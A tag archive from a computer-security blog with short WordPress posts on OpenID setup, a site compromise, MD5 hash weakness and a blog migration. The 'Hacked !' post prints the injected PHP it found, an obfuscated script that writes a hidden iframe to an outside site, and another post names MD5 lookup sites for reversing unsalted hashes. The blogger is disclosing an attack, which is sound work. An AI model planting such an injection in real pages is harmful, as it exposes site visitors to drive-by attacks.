Tag Archives: Wordpress

OpenID rants

After I tried to set this blog as my own OpenID provider using the OpenID WordPress plugin, I got a weired error message:

“This is an OpenID Server, Nothing to See Here… Move Along”

I could not find what as wrong, as all prerequisites were fulfilled, until I find this nice post. The patch there works very well, thanks to the author (it is a shame that it wasn’t yet included in the trunk).

This and the lack of active open-source development around OpenID seems to show that it is not really popular. It is a shame because it is a pretty good solution against the multiplication of passwords. I wouldn’t want to use OpenID for my bank account access, but it is just right for many sites, forums, etc. Unfortunately, no many sites are yet OpenID enabled and the choice when you want to become your own provider is very limited (most of projects listed in the official wiki are dead, with no update for the last 2 years).

Hacked !

This blog got hacked yesterday.

It looks like some spammer managed to inject some PHP code into almost all *.php files of WordPress.
It was not just like the classic SQL injection that is usually used to post some malicious post.

The following code was added :

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Continue reading →

OpenID is gaining popularity

Yahoo just announced that it will support OpenID.

OpenID is an interesting initiative to provide single-sign-on to user. It is both secure and simple, so it will be probably spread out quickly.

You can get your own OpenID by suscribing to a provider or setting up your own server if you got a domain name.

I will soon write an complete post about it, but now you can already check the official OpenID site.

Note that this blog already supports OpenID !

md5 hash googling – and WordPress password weakness

Some Md5 password implementation – without a salt, become more insecure than ever. There is an issue right now with WordPress, I hope they will fix it soon !

Check this interesting article.

No need to take out your rainbow tables anymore, just google your hash ! I hope your password is strong enough…

You could also use one of these :

http://md5.rednoize.com

http://md5.cryptobitch.de

Dotclear 2 to WordPress migration

Dotclear 2 has been bêta for too long and I thought it was time to go over the limitations of a bêta version.

It seems that many people around have done that way and WordPress is so popular that I should consider to give a try to it. Continue reading →

Phocean.net

Computer Security Blog